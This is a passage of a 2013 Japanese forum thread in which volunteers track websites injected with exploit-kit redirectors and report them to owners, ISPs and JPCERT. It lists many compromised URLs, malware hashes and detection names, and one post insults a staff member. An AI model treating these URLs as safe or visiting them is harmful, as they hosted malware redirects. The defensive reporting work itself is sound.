75 : お疲れ様です。 某公益社団法人のサイトがやられていますた。>BlackHole Exploit Kit おしんにめる済み
76 : kusuo-o●net ど う し て こ う な っ た ? c o m m o n / j s / s c r i p t . j s
77 : gakunavi●net
78 : >>76-77 どーん >76 >>75 と同じBlackHole Exploit Kit Redirector ユーザーへのメールは届かなかったみたい。 toやccが多いと不通になるようです。。。 >77 2013-05-07 08:28:11 UTC (日本時間 : 2013/5/07 17:28:11)にはVirusTotalに投げられてますた。 あきた寝る
79 : >>78 乙カレー丼 >>76 はミンスのHPに投げてみた
80 : 210●148●117●65/ 色々な意味でスゲェw
81 : >>76 の件 ミンスから返信 ・鯖業者と相談して対応 ・JPCERTにはミンス(党本部)から連絡済 とのこと。 kusuo-o●net >ただいまメンテナンス中です。 >後日公開させていただきます。 見に行ったらメンテ中だた...
82 : >>80 逆引きもぁぅぁぅぁー きゅう電工のWebフォームは漏れのメアドをスパム認定。。。orz...... 上流のIIJにつーほー >>81 他のページやjsは生きてるお フミダイかも 再要請すた。
83 : > 再要請 さくらにつーほ >>6
84 : >>82 >>76 アーッ orz
85 : コテ忘れるし、sageてないし… orz
86 : >>76 さくら対応 >>80 御本人様から対応のお返事頂きました 以上確認しました。 皆様お疲れ様です。 m(_ _)m
87 : BlackHole Exploit Kit Redirector 検体2通、いくつか宛先不通になってた 1通目は、薬物(Viagra等)販売サイトのドメインがあったので 同じとこ逝く2通目アドレス伏せたけど、中間スクリプトのドメインがNGだったもより orz........... 薬物販売サイトにも罠があるっぽい File size:[TAB]50.3 KB ( 51517 bytes ) File type:[TAB]HTML Detection ratio:[TAB] 2 / 47 Analysis date:[TAB] 2013-05-22 16:21:42 UTC Antivirus [TAB] Result [TAB] Update Avast [TAB] HTML:Script-inf [TAB] 20130522 GData [TAB] HTML:Script-inf [TAB] 20130522
88 : JaneViewの設定だお>[TAB] >87やりなおし File size: 50.3 KB ( 51517 bytes ) File name: pl.txt File type: HTML Detection ratio: 2 / 47 Analysis date: 2013-05-22 16:21:42 UTC Antivirus Result Update Avast HTML:Script-inf 20130522 GData HTML:Script-inf 20130522 んで感染サイトのスクリプトは File size: 8.4 KB ( 8624 bytes ) File name: index.html File type: HTML Detection ratio: 4 / 47 Analysis date: 2013-05-22 15:50:35 UTC Antivirus Result Update Fortinet JS/Iframe.DDG!tr.dldr 20130522 Kaspersky Trojan-Downloader.JS.Iframe.ddr 20130522 McAfee JS/Exploit-Blacole.ht 20130522 NANO-Antivirus Trojan.Script.Expack.bqgmvl 中間スクリプト File size: 241 bytes ( 241 bytes ) File type: HTML Detection ratio: 2 / 47 Analysis date: 2013-05-22 16:12:15 UTC Antivirus Result Update McAfee Exploit-Rekit.f 20130522 Sophos Troj/ExpJS-II 20130522
89 : ァッー 追っかけてたら、辿り付いた http://www.google.com/safebrowsing/diagnostic?site=ime.nu クッションサイトだからかな
90 : RedKit Exploit Kit Redirector ランダムな中間スクリプト File type: HTML Detection ratio: 3 / 47 Analysis date: 2013-05-26 14:39:38 UTC McAfee JS/Exploit-Blacole.lt 20130526 McAfee-GW-Edition JS/Exploit-Blacole.lt 20130526 Sophos Troj/ExpJS-II 20130522 まかひとそふぉぉぉぉすががむばってるん 相変わらずこちらの環境ではブツ落とせないままぽ
91 : memo g01pack exploit kit エフセキュアブログ : g01pack http://blog.f-secure.jp/tag/g01pack
92 : >>91 現在の最新情報 エフセキュアブログ : g01packがシェア拡大の兆し http://blog.f-secure.jp/archives/50701223.html
93 : www●muse●dti●ne●jp/~ohyes/
94 : >>93 お疲れ様です。 夢列車につーほーしますた。
95 : まだ直ってないようですが、 恐らくひげおぢさんがピコーンしたら対応されるかも>93 んで関連 2689367b205c16ce32ed4200942b8b8b1e262dfc70d9bc9fbc77c49699a4f1df/analysis/1166513002/ コメントしてる人やベンダーを責められないと思ふ ひょっとして>>15 なぬかようか
96 : >>95 MD5: 444bcb3a3fcf8389296c49467f27e1d6 http://docs.google.com/viewer?url=http%3A%2F%2Fwww%2Ejaipa%2Eor%2Ejp%2Fevent%2Foki%5Fict2011%2F111215%5Fmicrosoft%5Fhan%2Epdf
97 : www●trajal●net/k-b●html www●f-airline●com/ lukes-world●co●jp/ www2●patt●gr●jp/~ryo/
98 : 松浦とみよし 市議会議員 www4●ocn●ne●jp/~tomiyosi/ 連絡したのにこの状態。。。
99 : >>97-98 お疲れ様です。 つーほーしました。 以前にもつーほーしたのがあったやうな つーほー漏れかなん。。。orz...........
100 : 申告しても対処しないサイト www●yanagita-kk●co●jp/ www10●ocn●ne●jp/~kuushuu/ussbsindex●html www●arpak-cdc●co●jp/ w01●tp1●jp/~a541677231/ nanaplan●jp/kako_kenngakusai●html ir06●com/ www●garage-yamato●com/ www●fp-kazuna●com/insu/ www1●hinocatv●ne●jp/baba/ harakirievent●toypark●in/
101 : archivo-semiotica●com/ www●dorf●co●jp/access●html www●utsunomiya-es●com/ mado-works●com/staff●html www●86919●com/ xn--n8jxcwb2fra8229bokzg●com/ angelstone●co●jp/ bbs-beppin●com www●presen●co●jp/SERV●html harmony8●com g2g2●jp/ caiquesarepeopletoo●com/ cairo123●com/ www●antwarp●jp/souvenir/monthly_select/
102 : >>100 乙です Aまで上流に電話連絡済(対応する旨の事) 残件8 >>101 乙です 残件14
103 : >>102 >>102 Cまで済 尚、Cに関しては、HI BIT 経由の情報として 警視庁サイバー犯罪対策課がHPの所有者に連絡済とのこと
104 : >>103 残権に関しては、警視庁のお手並み拝見ということで撤収
105 : 何ヶ月も放置する駄目なOCNのユーザが大量感染 OCNはあてにならないので直接ユーザのメルアドに警告中。 メルアドがないのを助けてください www1●ocn●ne●jp/~ganja/ www1●ocn●ne●jp/~oohata/ www1●ocn●ne●jp/~takano8/ www11●ocn●ne●jp/~uten/ www12●ocn●ne●jp/~kaido/rw/
106 : www14●ocn●ne●jp/~yu4127/ www15●ocn●ne●jp/~nakanoah/ www15●ocn●ne●jp/~toshikaz/ www15●ocn●ne●jp/~vento/ www17●ocn●ne●jp/~skynet/ www18●ocn●ne●jp/~answer/ www18●ocn●ne●jp/~cos/
107 : 40件はHPのメルアドに警告完了 wwww2●ocn●ne●jp/~esi/ www18●ocn●ne●jp/~myouga/ www2●ocn●ne●jp/~littleb/ www2●ocn●ne●jp/~seafood/ www2●ocn●ne●jp/~skbld/ www2●ocn●ne●jp/~suwan/ www3●ocn●ne●jp/~charinko/ www3●ocn●ne●jp/~nino38/
108 : www4●ocn●ne●jp/~htgifu/ www8●ocn●ne●jp/~bito/ www8●ocn●ne●jp/~gzwave/ www8●ocn●ne●jp/~k-chico/ www9●ocn●ne●jp/~alingo/
109 : 皆様お疲れ様です。 >>105-108 以前の分でおしんにめる届いてたっぽいので纏めてつーほ フォームどーすべ >>104 なので診ませんですた。>>100-101 目がイタイのでしばしリタイア さいとあどばいざがgdgd。。。orz............
110 : >>109 お大事に >>105-108 連絡完了 OCNの中の人へ 対応窓口を誰にも分かるよう明確に、対応フローをしっかりとね ついでに↓も見ておくといいかも jpサート http://www.jpcert.or.jp/ Web サイト改ざんに関する注意喚起 http://www.jpcert.or.jp/at/2013/at130027.html IPA https://www.ipa.go.jp/ 2013年6月の呼びかけ「ウェブサイトが改ざんされないように対策を!」を公開しました。 https://www.ipa.go.jp/security/txt/2013/06outline.html 「ガンブラー」事件に匹敵するWeb改ざん報告、IPAが対策徹底を呼び掛け http://www.itmedia.co.jp/enterprise/articles/1306/04/news108.html [データ] 「Webサイト改ざん」が急増、「ガンブラー」流行時に匹敵、IPAまとめ http://bizmash.jp/articles/45655.html 国内サイト20件以上で、政治的な改ざんが発生 - 扇動しており規模拡大に警戒を http://www.security-next.com/040525 国内Webサイト改ざん事例続報:攻撃手法の詳細と得られる対策の教訓 http://blog.trendmicro.co.jp/archives/7367 国内のWebサイトの改ざんが拡大中 | トレンドマイクロ セキュリティ ブログ ... http://blog.trendmicro.co.jp/archives/3317 日本のWebサイト狙った改ざん攻撃に注意 - トレンドマイクロ http://news.mynavi.jp/news/2013/05/31/282/index.html 国内Webサイト改ざん事例、攻撃手法の詳細が判明 ― トレンドマイクロ http://is702.jp/news/1369/partner/101_g/
111 : >>105-108 知ってるとこあって驚いた。どうやってこんなに大量に感染サイトを見つけてくるんですか?
112 : ブラウザがブロックする元の情報となっている stopbadware です。
113 : >>110 @のganjaに電話で確認してみました OCNからの連絡はないとのこと 月曜以降に>>100 のAに連絡した窓口に お財布と相談しながら、もしかしたら連絡するかも
114 : ISPはOCNでだらしのないAbuseだし 何度もユーザにメールしても放置。 pacific-ocean●co●jp/
115 : あいぴーあどれすも ぁぅぁぅ
116 : icweb●jp/~mantashokudo/ www●fp-kazuna●com/insu/ showa-ts●co●jp/ www1●ocn●ne●jp/~niryo/ www32●ocn●ne●jp/~sirotaya/
117 : www4●ocn●ne●jp/~music-wa/ www6●ocn●ne●jp/~guuska/rink●htm www6●ocn●ne●jp/~sumika/ www8●ocn●ne●jp/~waga/
118 : おぱようごぜぇやす くこまでメルとかしまひた 補足 >>116 にもあいぴーあどれす ぁぅぁぅがありますた んで、いちばんすた、外部さいとが ぁぅぁぅ こりもつーほ >>117 のいちばんすた、壊れてるけどAviraがぴこーん
119 : 今北三g・・・ orz
120 : OCNはこのスレを巡回リストに入れたとの事なので自助努力して貰いましょう つまり、このスレのOCNの改ざんサイトは、OCNが自主的に対応するということです あんまり頑張り過ぎると禿げたり目が痛くなるので少しは楽をしましょう>>all >>110 追加 5月末に急増した改ざん、「IISサーバ」が標的か - 「Gumblar」と類似点 http://www.security-next.com/040688
121 : とはいえ>>113 の>>110 @のganja ← これはHPの所有者に電話したので閉鎖されている様ですが Aoohataは対応されていません おそらくOCNは口先だけなのでしょうね なので、警視庁サイバー犯罪対策課の方 お話した通り逮捕しちゃってください
122 : 申告したものも真面に対応できないOCNが。。。 デタラメでしょうね。 昔に、出会い系サイトにたいし警察から警告を受けたホスティング屋が 対応が遅かったりしなかったとして幇助で捕まったことがありましたが 本当に逮捕してくれるといいですね。OCNだと良い刺激になるでしょう
123 : そういえばOCNのメアドがわかる29サイトには、直接警告しましたが 50%は2日で対処している。OCNの案内は対処の仕方の案内が駄目なんでしょうね。 期限も切って表示停止にもできないチキンがOCNということでしょう
124 : >>105 >>106 別経由で連絡先わかったとこに電凸。 ほとんど皆さんからの警告も、OCNからの警告も気づいてないです。 むしろ、こっちが疑われて「この電話番号を警察に言う」とか逆切れされた(泣) やっぱりおしんに元から強制排除してもらうのがいいかもしんない。
125 : > システムメンテナンス作業に伴うサービス停止のお知らせ > > ただ今、システムメンテナンス中のため、 > 弊社ホームページをご利用いただけません。 > > ご不便おかけしますが、しばらくお待ちください。 ガ━━━━━━(゚д゚lll)━━━━━━ン
126 : んー、だめぽ >>124 お疲れ様ですお疲れ様です。 それとなくJPCERTやIPAにこのスレのこと伝えてあるので……
127 : >>117 のいちばんすた、Script追加されてた ゆーどーさき こちらの環境だと>>96
128 : 復帰カキコ 頭隠して尻隠さず ってのが某所にあるぽ フミダイかなん
129 : operation name:hyaena http://engawa.2ch.net/test/read.cgi/isp/1370760773/
130 : いやービックリ!あのOCNが本当に止めましたよ。 それでは、OCNさん以下も止めてください www1●ocn●ne●jp/~niryo/ www32●ocn●ne●jp/~sirotaya/ www4●ocn●ne●jp/~music-wa/ www6●ocn●ne●jp/~guuska/rink●htm www6●ocn●ne●jp/~sumika/ www8●ocn●ne●jp/~waga/ www9●ocn●ne●jp/~tada1ppo/06aisatukanben●htm www17●ocn●ne●jp/~skynet/
131 : www1●ocn●ne●jp/~agraph/ www1●ocn●ne●jp/~pageone/ www10●ocn●ne●jp/~akachanf/ www11●ocn●ne●jp/~gen0929/ www13●ocn●ne●jp/~yaesu/ www15●ocn●ne●jp/~yktk/ www17●ocn●ne●jp/~omura/
132 : www18●ocn●ne●jp/~b-miz/ www2●ocn●ne●jp/~kyowawin/ www2●ocn●ne●jp/~stkr/ www4●ocn●ne●jp/~sakura77/ www8●ocn●ne●jp/~daitou/ 以下はリダイレクトページ www17●ocn●ne●jp/~addtech/ www17●ocn●ne●jp/~kinsicho/
133 : OCNを動かしてくれた皆さん感謝です。 これも明日止まることを期待。。。
134 : それは無理かと 準備期間が必要でしょ(確認作業+連絡+猶予期間等々)
135 : むにゃむにゃねむい 先程フォームからつーほ>>6 すぐにお返事来ました。>>63 >>130-132 お疲れ様です。 >>120 とゆーことで診ませんですた って、いくつかつーほー済みのやうな…
136 : 新規 www11●ocn●ne●jp/~sayacha/ www5●ocn●ne●jp/~fukuzen/ www7●ocn●ne●jp/~sclamp/ 再感染(それも初めて見たパターン 新種?) www16●ocn●ne●jp/~chesnuts/ Toppageだけ対処 www14●ocn●ne●jp/~teamf/touroku●html www17●ocn●ne●jp/~clover4/cosmet_hair●html www5●ocn●ne●jp/~sfuru/houshu/houshu_menu●htm www8●ocn●ne●jp/~aikamu/company●html www9●ocn●ne●jp/~tada1ppo/06aisatukanben●htm
137 : サーキュレーター探してたらいきなりMSEが開いた。 トロイの木馬ってのを検出して自動で削除画面が出る。 更新しても、そのたびに出る。 俺だけ?それともこの会社のページがだれかにやられたの? 株式会社ナカトミ | 45cm工場扇 OPF-45S http://www.nakatomi-sangyo.com/fan/opf-45s.html
138 : Trojan:JS BlacoleRef.CZ と名前はでてる 他にも一緒に入れられる?MSEはそれしか検出してないんだけど
139 : 誤検出っぽい。お騒がせした。
140 : Aviraがピコーン つーほー作業に入ります。。。
141 : つーほすた
142 : www●horizonz●co●jp satochokusen●co●jp
143 : >>130-132 ,136 なかなか対応されないので電話してみました 訃報です OCNはこのスレの巡回を止めたそうです 正規のフロー(フォームから)に従って連絡があれば対応するとのこと お問い合わせフォーム http s:// cgi01.ocn.ne.jp/support/abuse/blog.html 今回は罪滅ぼしの意味合いで私がフォーム発射&完了 &担当部署(セキュリティ)に電話
144 : 皆様 お疲れ様です >>142 NTTPCコミュニケーションズにめるしました。 >>143 ガ━━━━━━(゚д゚lll)━━━━━━ン
145 : 閑話休題 漏れがVTに投げた懐かしの8080 https://www.virustotal.com/en/file/64b9d4cf390e37a1017b8a585917c0d21c476cdd59193cc3b28fe46861ffd921/analysis/1262711933/ SHA256: 64b9d4cf390e37a1017b8a585917c0d21c476cdd59193cc3b28fe46861ffd921 File size: 4.5 KB ( 4651 bytes ) File name: JavaGame.jar File type: JAR Detection ratio: 8 / 41 Analysis date: 2010-01-05 15:35:32 UTC 2年半経って誰かが投げてた https://www.virustotal.com/en/file/64b9d4cf390e37a1017b8a585917c0d21c476cdd59193cc3b28fe46861ffd921/analysis/1340451906/ File size: 4.5 KB ( 4651 bytes ) File name: jar_cache8170738606501754937.tmp Detection ratio: 31 / 42 Analysis date: 2012-06-23 11:45:06 UTC 同じ日に漏れがVTに投げた8080 https://www.virustotal.com/en/file/a58e3a42daf56fa95d67a157b9c699e43e89e254bcc717ff04d9d19d1ffb40b4/analysis/1262711712/ SHA256: a58e3a42daf56fa95d67a157b9c699e43e89e254bcc717ff04d9d19d1ffb40b4 File size: 63 bytes ( 63 bytes ) File name: win.jpg File type: unknown Tags: exploit cve-2008-0015 Detection ratio: 20 / 41 Analysis date: 2010-01-05 15:38:31 UTC 3年経って誰かが投げたの https://www.virustotal.com/en/file/a58e3a42daf56fa95d67a157b9c699e43e89e254bcc717ff04d9d19d1ffb40b4/analysis/1363173304/ File name: win[1] Detection ratio: 16 / 45 Analysis date: 2013-03-13 11:15:04 UTC 定期的に誰かが過去のブツを診てるんだろか しかも検出率が下がってるのがあるってのは……
146 : http://kohada.2ch.net/test/read.cgi/sec/1370942055/10 いつもお世話になってます。 m(_ _)m 改竄数20倍かぁ。。。
147 : www●miwax●co●jp/ nishikutu●co●jp/ chiyoda-nagoya●co●jp/ kaigokeieigakkai●jp/ www●hanabusa-office●jp/ casinotaro●com/ coscos●info/ orpheus●6●ql●bz/top●html defi-pro●com/ himesou●jp/ www●eekuchikomi●com/ www●deaipeace●com/
148 : queenuruga●weblog●tc/ 77x●info/ bukyu●net/ etaiken●info/ www●etaiken●info/ safetyzone●jp/ curesmile●net/
149 : >>147 Hdefi-pro●com/ 連絡済 Ihimesou●jp/ 404 DEFJK デジロックは放置 >>148 @ABCD デジロックは放置 Fテラワロス
150 : お疲れ様です。 こちらからも受け取ってくれるかは不明ですが一通にてつーほーしました。 時間が掛かったので、既に対応してるっぽいのがあるん。。。orz...... >>149 > 404 www草付けるとピコーン リダイレクトされてるお
151 : www●chiyoda-nagoya●co●jp/ curesmile●net/ shmj●jp/
152 : ハゲスクネモイ お疲れ様です。 >>151 上二つは>>150 で一つに纏めてホスティングにめる送付済み 最後のはIPアドレスもあばばばばば 誘導先もあばばばばば これもIPアドレスあばばばばば それぞれ分けて二通めるしました。
153 : Analysis Center (jpcert_ac) on Twitter https://twitter.com/jpcert_ac/status/343936667083751424 > ここ最近の Web サイト改ざんですが、そのシグネチャである 6桁の 16進数からコードネーム: COLOR として我々は調査・分析を進めています。 https://twitter.com/jpcert_ac/status/345343485387345920 > Color 改ざんですが、現在確認できているパターンは画像のとおりです。他にも情報があれば是非ともご報告ください。
154 : 相次ぐWebサイト改ざん被害 遅れる対応-ばびぶべぼBlog blog.babibubebo.org/archives/648
155 : vol1●co●jp/ favorite-place●co●jp/ aa287●net/ 27●50●104●30/ bluepower●jp/
156 : www●ocn●ne●jp/~usp yc-oiso●co●jp/ www●vertex-co●jp/ vertex-co●jp/ sub-lease●co●jp/
157 : 越谷市議会議員 大石みえこ www●me-oec●jp/
158 : 一箇所診るのに3時間…… おつかれさまです っと、ゆーわけで155の一番目だけめるしました。 (゚ν゚) 説明ムズカスィネー
159 : www1●ocn●ne●jp/~hiroin/ www1●ocn●ne●jp/~ruri-5k/ www3●ocn●ne●jp/~kyouei/ www3●ocn●ne●jp/~ootsuka3/ www3●ocn●ne●jp/~yuuaikai/ www5●ocn●ne●jp/~itosj/ www5●ocn●ne●jp/~pogo/index5●html www6●ocn●ne●jp/~no-seki/espanol/este_instituto●htm www6●ocn●ne●jp/~snwest/ www6●ocn●ne●jp/~yoko-yh/
160 : www7●ocn●ne●jp/~jasmine1/ www8●ocn●ne●jp/~ntlkk/ www10●ocn●ne●jp/~usp/ www11●ocn●ne●jp/~noburu/ www12●ocn●ne●jp/~hokuyou/ www13●ocn●ne●jp/~tpark/ www15●ocn●ne●jp/~super/4rinbkpad/click-htm/honda-click●htm www16●ocn●ne●jp/~m●hiroba/ www16●ocn●ne●jp/~permayav/ www16●ocn●ne●jp/~voyager3/ www18●ocn●ne●jp/~yrfc/ www2●ocn●ne●jp/~oimo/
161 : 福島県商工会連合会 www●do-fukushima●or●jp/fukuseiren/ 商工会ってどこも感染しまくっている
162 : >>155 @ABCD NTTコミュニケーションズのブツは>>143 のOCNのフォームでおkなので発射完了 担当部署(セキュリティ)への電話は月曜以降 >>156 @ 404 ABC NTTコミュニケーションズのブツは>>143 のOCNのフォームでおkなので発射完了 担当部署(セキュリティ)への電話は月曜以降 D私に分からないのでパス >>157 議員本人に連絡、完了 >>159-161 後程
163 : >>159-160 フォーム発射完了 >>161 月曜以降
164 : kobeiccgolf●or●jp/kita_kobe/gdo/ c-house●or●jp/ akashikaisei-hp●or●jp/recruit_contact kumamoto-norimen●or●jp/ www●la-la-la●or●jp/
165 : >>164 @BOCNフォーム発射完了 ACD月曜以降
166 : esn●co●jp futurebud●co●jp h-seiken●co●jp haruyamakensetsu●co●jp/include/url●js kizaitecto●co●jp kk-nishimaki●co●jp/js/window●js kk-nishimaki●co●jp/js/navi●js mikic●co●jp morisaki-kk●co●jp muratasekkei●co●jp
167 : advance-sakura●co●jp eishin-maoyi●co●jp favorite-place●co●jp grow-ltd●co●jp h-refresh●co●jp innk●co●jp k02●co●jp kaigai-inc●co●jp/resource/secure/ 改ざん kasuga-mfg●co●jp okamoto-denki●co●jp
168 : www●znet●ne●jp/msd/ www●createur-net●com/ www●araiyasan●jp/ www●tuziwa●jp/ ichigu●memopad●org/ 8080並みやね…これ
169 : >>166 @ACDGH OCNフォーム発射完了 EF0c0896確認 OCNフォーム発射完了 B私には分からないのでパス >>167 @ABCDEFHI OCNフォーム発射完了 G私には分からないのでOCNへ、改ざん有無の精査を依頼
170 : >>168 www●znet●ne●jp/msd/ 鯖丸ごとやられてる感じw ↓ www.google.co.jp/search?hl=ja&source=hp&q=site%3Awww.znet.ne.jp%2Fmsd%2F&btnG=Google+%E6%A4%9C%E7%B4%A2&gbv=1
171 : >>169 >>167 Gのやつ jsunpack 411eac06a7475cdd11450051ca075fdc17594caf virustotal www.virustotal.com/ja/url/7362a2240ccdabcebe7ad4cb0e90512da40669fbe56bb8b881564610d49f2f4e/analysis/1371959125/ www.virustotal.com/ja/file/9da5a899b9d55e1d43718ec0ad6368f9e9ef0242a4e88cd5ddb2cc6d7bfa5fb3/analysis/1371830823/
172 : znetはコンピュータソフト開発のパティオシステムズですね。 どうりで最近三重県ばかりが何故多いのかと思ってた。
173 : お疲れ様です。 166の三番目みます
174 : 病理ウイルスも、パンデミックを通り越して常態化した場合は個人の体力や免疫に頼るしかないように コンピュータウイルスも、脆弱性の無い最新の環境(新しいPC、最新のOS)を整えるしかないのでしょう w7が出る前のガンブラー騒動、w8.1が出る直前の今回 タイミング的にもやはり、マイクロソフトの販促キャンペーンでしょうかw 166のBはおそらく <!--0c0896--> から <!--/0c0896--> まで www.virustotal.com/ja/file/e4422ac4ca9fafa8110127ddfff298f9f78065f336dafaacaf8ce9db294a03f1/analysis/1371976952/ 窓口が休みなので月曜以降にフローを確認してから
175 : >>173 ど−ん フォームはlynx使ってみた。 ちょん切れちゃった。。。orz....... >>174 んだなす
176 : 167の八番目みます applet archive="otxUB.jar"
177 : >>176 とりあえずベンダーに送付 なんか他にもありそう……
178 : めも http://wepawet.iseclab.org/view.php?hash=0eae6985b6ab7467ae764e066a3f3d45&t=1369380290&type=js Hash 52390e6a6c74db94eb86c72034328989 https://www.virustotal.com/en/file/fc5cdd4cbc7ba76979088d4afadbf97456069206545a37fc390aa6210a2fb501/analysis/1369643146/ SHA256: fc5cdd4cbc7ba76979088d4afadbf97456069206545a37fc390aa6210a2fb501 SHA1: 9c702e0865b1be8fbfa743bcb7fea45bcc09bf87 MD5: 52390e6a6c74db94eb86c72034328989 File size: 336.9 KB ( 345005 bytes ) 現時点404
179 : ( ゚∀゚)アハハ八八ノヽノヽノヽノ \ / \/ \ SPAM扱いされて、いくつかベンダーに届かないでやんよ>>177
180 : >>170 www.google.com/safebrowsing/diagnostic?site=www.znet.ne.jp/msd/&hl=ja 検索結果を見ると… >このサイトはコンピュータに損害を与える可能性があります。 >このサイトはコンピュータに損害を与える可能性があります。 >このサイトはコンピュータに損害を与える可能性があります。 >このサイトはコンピュータに損害を与える可能性があります。 >このサイトはコンピュータに損害を与える可能性があります。 >このサイトはコンピュータに損害を与える可能性があります。 >このサイトはコンピュータに損害を与える可能性があります。 \(^o^)/ハジマタwww
181 : http://kohada.2ch.net/test/read.cgi/sec/1295261877/329 誤爆orz >>166 B 完了 ドメイン管理=ステージグループ(ホームページ制作)ここの対応も優 >>168 @ 一応完了※但し、馬鹿過ぎて話にならず A完了 クレアトゥール 福井 ← そもそも電話に出ないので上流へ電話 → GMOインターネット株式会社 B一応完了 残念な人達の様なので無理ぽ C 一応完了 残念な人達の様なので無理ぽ D 完了 NPO法人 一隅を照らす会の馬鹿女に伝えておきました ドブス馬鹿女へ、 関係ないなら何故閉鎖するのか、R!
182 : >>180 znet.ne.jp は禿にリダイレクトされてるもより これで対応したつもりなんでしょ
183 : オツカレサマデス こちらの環境では>168の五番目がぁぅぁぅのままだったので鯖管にめるしました。 フォームでは漏れのめあど蹴られちゃう
184 : >>183 >>183 ドブス馬鹿女が一旦閉鎖した後、一時間程で再開しくさったのです
185 : saitoadobaizanikisaishimasuta
186 : >>181-185 乙カレー www●fukushima-l●com/forrent/ www●nifa●co●jp/ www●guitaristlip●com/ www●moonshot●co●jp/ www●montessori-japan●com/ 消えてもらったほうがいいようなサイト rockbook01●awe●jp/dekome/
187 : 【忍者ホームページ】ホームページの改ざん被害にご注意下さい ※要確認※|お知らせ|忍者ツールズ http://www.ninja.co.jp/information/all_category/info/8449/ 間に合うかな? 時間がキビシーのもあって >>186 の一番目だけみます とっぷからぁうぁう
188 : >>187 どーん 結構根が深かった……
189 : >>186 @サイト所有会社に電話連絡完了(すでに把握していたもより) Aパス(対応済みと思われ) BOCNフォーム発射完了 Cサイト所有会社に電話連絡完了 Dサイト所有会社に電話連絡完了 Eデジロックは放置(そもそも無理ぽ) ※デジロック以外は全力で対応 いずれweb改ざんの元凶はデジロックであるとして 司直の手により殲滅
190 : www12●ocn●ne●jp/~kabanos/ www7●ocn●ne●jp/~takara3/ www10●ocn●ne●jp/~clubpome/ www6●ocn●ne●jp/~ohisama1/ www5●ocn●ne●jp/~yukio●ok/ www13●ocn●ne●jp/~touki/ www17●ocn●ne●jp/~bonsai/ www2●ocn●ne●jp/~kikikm/
191 : >>190 OCNフォーム発射完了
192 : バリュードメインvalue-domain.com(デジロック)正規フロー窓口を聞き出しました www.value-domain.com/webabuse.php ↑の一番下にフォームがあります >>186 E フォーム発射完了 対応されるかtest
193 : >>186 の2番目 JSとかぁぅぁぅ さいとあどばいざにきさいしますた ntt.netはあぶせにめるだけでいいのかな? >>183 鯖管から対応かんりょのお返事いただきました 上流になるのかな?>鯖管
194 : >>193 >>>186 の2番目 ./common/js/thickbox.js ./common/js/jquery.fontScaler.js"他いっぱい確認しました www.virustotal.com/ja/file/15652cb5a2c3ec3abecd5530c2615cd863f1fa633a8878a434b43c196082ed11/analysis/1372406516/ トップの0112722100にお知らせしましたが、HPを製作した委託先とは切れていて分かる人はいないそうです jpサートとIPAの相談電番を案内してみました >>>183 >鯖管から対応かんりょのお返事いただきました 乙です >上流になるのかな?>鯖管 ジャマイカ
195 : >>194 お疲れ様ですお疲れ様です んでも>>186 の2番目、今の時点でぃれくとりぃぐゎ(ry なぜん?
196 : 21:00からですん 以前の委託先に緊急連絡したんでしょ そんなんかな ついでに言わしちくり やられたでござる←むかつくねん
197 : りねーむすてるん。なんか公開修正みたいな木が汁 ご愁傷様 > やられたでござる
198 : 話題のwww●nifa●co●jp/ 2013XXXXCopy_of_info.php 2013XXXXCopy_of_index.php コードそのまま引きずってるとか・・ なんだよこれww もしかして露出狂?
199 : 別件 > Google セーフ ブラウジング > > 内容を送信しました > > Google にご報告いただきありがとうございます。これで報告は完了です。よろしければこちらもご覧ください。 > > 1. ウェブ環境の安全性向上に貢献したご自分の功績を、しばしの間称えてあげましょう。 > > 2. ウェブブラウザが最新バージョンであり、使用しているオペレーティング システムに最新のパッチが適用されていることを確認しましょう。 > > 3. Stopbadware.org にアクセスしてパソコンに感染する可能性のあるマルウェアの詳細について確認しましょう。 超ネムイのでこくまで…… つかぐぐるにBlockされっぱなし。。。orz...........
200 : www4●ocn●ne●jp/~sawa/get-novel●htm www4●ocn●ne●jp/~kiyotomo chiyoichi●com/ www●h-seiken●co●jp art-tokugawa●com vol1●co●jp auseiki●com/ www●okamoto-denki●co●jp/
201 : >>200 @ABCDEFGOCNフォーム発射完了 E>>155 @ 又貸ししてると無理らしいが、リベンジ Gテスト的に岡本電気工業株式会社に連絡してみました
202 : >>194 さま 6/28 WEB改ざんに関して丁重にご指導して頂きまして、ありがとうございました。 おかげさまで、ホームページを復旧させることができましたことをこの場をお借りしてご報告させて頂きます。 また、教えて頂いた対策を一通り行いました。 今後は、発見される脆弱部のアップデートと、改ざんされた際の早急な対応を心がけていきたいと思います。 ご教授して頂いたことに深く感謝申し上げます。
203 : >>110 ,120,146,153 追加 ウェブサイト改ざんの増加に関する一般利用者(ウェブ閲覧者)向け注意喚起 www.ipa.go.jp/security/topics/alert20130626.html 相次ぐWeb改ざん、原因はまたもや“Gumblar”か itpro.nikkeibp.co.jp/article/NEWS/20130702/488823/ Web改ざん検知と脆弱性診断をセットにした「BIGLOBE Webホスティング セキュリティセット」 提供開始〜8月30日までのご契約で3カ月無料キャンペーンを実施〜 www.sankeibiz.jp/business/news/130701/prl1307011548082-n1.htm >>202 セキュ板の集合知の為せる業です わざわざ最果ての過疎地へ報告どもですー
204 : 同じ日に取材なのね 急増するWebサイト改ざん、原因は「ガンブラー」か :日本経済新聞 http://www.nikkei.com/article/DGXNASFK0203F_S3A700C1000000/ なんでもかんでも「ガンブラー」ってのには無理があるような>報道論調 まだところどころでぃれくとりぃぐゎ>>197
205 : まあ既存の何かと似たものがあればそれに例えたほうがわかりやすいからね
206 : ・ω・
207 : Last-Modified: Wed, 03 Jul 2013 13:41:32 GMT 81a338確認
208 : https://www.virustotal.com/en/file/53ba09c116e4fdd7881e8a1c55b59686ff83345b61a852d7e8cda0e25e466ee3/analysis/1372949390/ 20 / 47
209 : >>207-208 鯖管に凸 さいとアドバイザのばぐやろー!!!!!!!!!!!!!!!!!!!!!!
